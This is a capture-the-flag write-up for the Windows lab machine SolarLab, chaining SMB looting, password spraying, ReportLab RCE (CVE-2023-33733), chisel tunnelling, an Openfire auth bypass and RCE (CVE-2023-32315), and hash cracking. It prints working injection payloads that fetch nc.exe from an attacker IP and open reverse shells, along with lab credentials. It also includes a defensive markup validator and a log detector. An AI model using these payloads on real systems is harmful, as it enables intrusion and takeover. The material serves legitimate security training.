Solar Lab

OS: Windows
Difficulty: Medium
Points: 30

Nmap

ports=$(nmap -p- --min-rate=5000 -T4 10.129.245.145 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -vvv -p $ports -sC -sV -oN nmap.txt 10.129.245.145
Nmap scan report for 10.129.245.145
Host is up, received echo-reply ttl 127 (0.20s latency).
Scanned at 2024-05-11 20:42:53 EDT for 58s

PORT     STATE SERVICE       REASON          VERSION
80/tcp   open  http          syn-ack ttl 127 nginx 1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.24.0
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack ttl 127
6791/tcp open  http          syn-ack ttl 127 nginx 1.24.0
|_http-server-header: nginx/1.24.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

We add the domain and the subdomain to our hosts file.

echo "10.129.245.145  solarlab.htb report.solarlab.htb" >> /etc/hosts

There is a share called Documents on SMB.

┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# smbclient -L 10.129.245.145                                                        
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Documents       Disk      
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.245.145 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

We can access the share.

┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# smbclient //10.129.245.145/Documents 
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Fri Apr 26 10:47:14 2024
  ..                                 DR        0  Fri Apr 26 10:47:14 2024
  concepts                            D        0  Fri Apr 26 10:41:57 2024
  desktop.ini                       AHS      278  Fri Nov 17 05:54:43 2023
  details-file.xlsx                   A    12793  Fri Nov 17 07:27:21 2023
  My Music                        DHSrn        0  Thu Nov 16 14:36:51 2023
  My Pictures                     DHSrn        0  Thu Nov 16 14:36:51 2023
  My Videos                       DHSrn        0  Thu Nov 16 14:36:51 2023
  old_leave_request_form.docx         A    37194  Fri Nov 17 05:35:57 2023

                7779839 blocks of size 4096. 1895172 blocks available
smb: \>

We download the file details-file.xlsx.

smb: \> get details-file.xlsx
getting file \details-file.xlsx of size 12793 as details-file.xlsx (21.4 KiloBytes/sec) (average 21.4 KiloBytes/sec)

We see that it contains usernames and passwords.

User Enumeration

On the web page http://report.solarlab.htb:6791/login there is an authentication form. The page shows different messages depending on whether the user exists or not, which lets us enumerate users.

Once we have the users we can do password spraying.

The blakeb account lets us in.

blakeb : ThisCanB3typedeasily1@

ReportLab RCE (CVE-2023-33733)

After testing all the functionality we notice that the application generates PDFs with the ReportLab library.

We identify that this library has an RCE vulnerability.

https://github.com/Sudistark/BB-Writeups/blob/main/2023/CVE-2023-33733-rce-via-htmli-in-reportlab.md

While testing we found that we can exploit this vulnerability in the Travel Approval function, but only through the travel_request parameter, since the others have some restrictions.

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('curl 10.10.14.218') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>

┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# python3 -m http.server 80                     
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.245.145 - - [11/May/2024 22:49:02] "GET / HTTP/1.1" 200 -

With this we can get a reverse shell. First we create a folder where we will download nc.exe.

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('mkdir c:\\temp') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>

We download the binary into the folder.

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('curl 10.10.14.218/nc.exe -o c:\\temp\\nc.exe') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>

Then we run the reverse shell.

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('c:\\temp\\nc.exe -e cmd.exe 10.10.14.218 1234') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>
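A defensive counterpart to the payloads above, added here as an example that is not part of the original writeup: a strict allow-list validator for the paragraph markup before it is handed to ReportLab. The tag and attribute sets, colour names and sample strings are assumptions; the real fix is upgrading ReportLab to 3.6.13 or later, and this check additionally removes the injection point on any version by never letting an expression reach the color attribute.

```python
import re
from html.parser import HTMLParser

# ReportLab before 3.6.13 evaluated the <font color="..."> attribute as a Python
# expression, which is the injection point CVE-2023-33733 abuses. Only a plain
# colour literal (named or #rrggbb) is ever accepted here, so no expression
# reaches ReportLab's evaluator at all.
NAMED_COLORS = {"red", "green", "blue", "black", "white", "gray"}
HEX_COLOR = re.compile(r"^#[0-9a-fA-F]{6}$")
ALLOWED_TAGS = {"para", "font", "b", "i", "u", "br"}
ALLOWED_ATTRS = {"font": {"color", "size"}}

def is_safe_color(value):
    """True only for a named colour or #rrggbb; anything else is rejected."""
    if value is None:
        return False
    value = value.strip()
    return value.lower() in NAMED_COLORS or HEX_COLOR.match(value) is not None

class MarkupValidator(HTMLParser):
    def __init__(self):
        super().__init__()
        self.problems = []  # every tag/attribute outside the allow-list

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.problems.append(f"tag <{tag}> not allowed")
            return
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.problems.append(f"attribute {name} on <{tag}> not allowed")
            elif name == "color" and not is_safe_color(value):
                self.problems.append(f"color rejected: {str(value)[:30]!r}")
            elif name == "size" and not (value or "").isdigit():
                self.problems.append(f"size rejected: {value!r}")

def validate_markup(markup):
    """Return the problems found; an empty list means the markup contains only
    formatting ReportLab can render without evaluating user input."""
    parser = MarkupValidator()
    parser.feed(markup)
    parser.close()
    return parser.problems

# Constructed sample shaped like the injection used against this box (the
# generator expression is elided; the validator rejects it on form alone).
INJECTED = ('<para><font color="[[[getattr(pow, Word(\'__globals__\'))'
            '[\'os\'].system(\'id\') for Word in [...]]] and \'red\'">x</font></para>')
CLEAN = '<para><font color="#1a2b3c" size="12">Travel request</font></para>'
```

Run `validate_markup()` on the travel_request value and refuse the request when the list is non-empty; a rejected value is also worth logging as an attempted injection.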

Lateral Movement

Once inside the machine we identify that Openfire is installed.

c:\Program Files>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 385E-AC57

 Directory of c:\Program Files

05/03/2024  02:34 PM    <DIR>          .
05/03/2024  02:34 PM    <DIR>          ..
11/16/2023  10:39 PM    <DIR>          Common Files
04/26/2024  04:39 PM    <DIR>          Internet Explorer
11/17/2023  11:04 AM    <DIR>          Java
11/16/2023  10:47 PM    <DIR>          Microsoft Update Health Tools
12/07/2019  12:14 PM    <DIR>          ModifiableWindowsApps
11/17/2023  03:22 PM    <DIR>          Openfire

Port Forwarding

We will do a port forward with chisel to reach the Openfire port. We download the program to the machine.

python3 -m http.server 80
curl 10.10.14.105/chisel.exe -o c:\temp\chisel.exe

We create the tunnel as follows.

┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# /opt/linux/chisel server -p 5555 --reverse                                                                              
2024/05/11 23:27:38 server: Reverse tunnelling enabled
2024/05/11 23:27:38 server: Fingerprint TOEwBCujyzAMJQGNMI8GuRRNJUqUJzmvpWlm/zVbC08=
2024/05/11 23:27:38 server: Listening on http://0.0.0.0:5555
2024/05/11 23:28:31 server: session#1: tun: proxy#R:9090=>9090: Listening
c:\temp>chisel.exe client 10.10.14.218:5555 R:9090:127.0.0.1:9090
chisel.exe client 10.10.14.218:5555 R:9090:127.0.0.1:9090
2024/05/12 06:28:30 client: Connecting to ws://10.10.14.218:5555
2024/05/12 06:28:31 client: Connected (Latency 167.5984ms)

Now we can access the portal.

OpenFire Auth Bypass (CVE-2023-32315)

In our initial research on Openfire we identified that we can obtain RCE, as the following resources describe.

https://github.com/miko550/CVE-2023-32315
https://vulncheck.com/blog/openfire-cve-2023-32315
https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT

We create a random user.

┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# python3 CVE-2023-32315.py -t http://127.0.0.1:9090


 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗      ██████╗ ██████╗ ██████╗  ██╗███████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗     ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚═══██╗██╔═══╝  ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝     ██████╔╝███████╗██████╔╝ ██║███████║
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝      ╚═════╝ ╚══════╝╚═════╝  ╚═╝╚══════╝
                                                                                                       
Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!

[..] Checking target: http://127.0.0.1:9090
Successfully retrieved JSESSIONID: node01rz9bs7xhmxrf13l0fomzxgetx1.node0 + csrf: holx9y5uZIvsaGw
User added successfully: url: http://127.0.0.1:9090 username: i78j4t password: 5vsjyv

With those credentials we can log in.
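Detection logic for this bypass, added as an example that is not part of the original writeup. The log format, regexes and sample lines are constructed assumptions; the flagged pattern is the %u-encoded dot-dot traversal through the unauthenticated /setup/ tree that the resources linked above describe for CVE-2023-32315.

```python
import re
from urllib.parse import unquote

# Constructed sample in a simplified combined-log shape (assumption: a real
# Openfire/Jetty or reverse-proxy access log needs its own regex).
# CVE-2023-32315 reaches admin pages through the unauthenticated /setup/ path
# by climbing out of it with encoded '..' segments; once setup is complete,
# any request that does this is an attack, not legitimate traffic.
SAMPLE_LOG = """\
10.10.14.218 - - [12/May/2024:06:30:01 +0000] "GET /login.jsp HTTP/1.1" 200
10.10.14.218 - - [12/May/2024:06:30:05 +0000] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp HTTP/1.1" 200
10.10.14.218 - - [12/May/2024:06:30:09 +0000] "POST /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?username=i78j4t HTTP/1.1" 302
10.10.14.218 - - [12/May/2024:06:31:00 +0000] "GET /plugin-admin.jsp HTTP/1.1" 200
10.10.14.218 - - [12/May/2024:06:31:30 +0000] "GET /images/setup/..%2f..%2fuser-create.jsp HTTP/1.1" 404
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
UNICODE_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")

def normalize_path(target):
    """Strip the query string, decode the non-standard %uXXXX escapes some
    servlet containers accept, then ordinary %XX escapes."""
    path = target.split("?", 1)[0]
    path = UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), path)
    return unquote(path)

def is_setup_traversal(target):
    """Flag a request that enters a setup directory and then climbs out of it
    with '..' segments once every encoding layer has been removed."""
    segments = normalize_path(target).split("/")
    return "setup" in segments and ".." in segments

def scan_log(text):
    """Return (method, decoded path, status) for every flagged request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_setup_traversal(m.group("target")):
            hits.append((m.group("method"), normalize_path(m.group("target")), m.group("status")))
    return hits
```

A 200 on a flagged user-create.jsp request, followed by a new admin user in the console, is the sequence that produced the credentials above; alerting on the first request catches it before the account exists.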

OpenFire RCE (CVE-2023-32315)

Now we will get RCE as follows. First we download the plugin openfire-management-tool-plugin.jar and upload it in the plugins section.

Once the plugin is uploaded we go to Server Settings and select the Management Tool option.

It will ask for the password, which is 123, and we get in. Then we select the system command option to run commands.

We get a reverse shell.

c:\temp\nc.exe 10.10.14.218 4444 -e cmd.exe

Privilege Escalation

With winPEAS we can obtain the NTLMv2 hash and crack it afterwards.

┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt            
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
HotP!fireguard   (openfire)     
1g 0:00:00:13 DONE (2024-05-12 00:01) 0.07530g/s 835855p/s 835855c/s 835855C/s Howla8@hotmail.co.uk..Honey40
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 

We verify that we have access.

┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# crackmapexec smb 10.129.245.145 -u 'openfire' -p 'HotP!fireguard'
SMB         10.129.245.145  445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.129.245.145  445    SOLARLAB         [+] solarlab\openfire:HotP!fireguard
Administrator : ThisPasswordShouldDo!@
impacket-psexec Administrator@10.129.245.145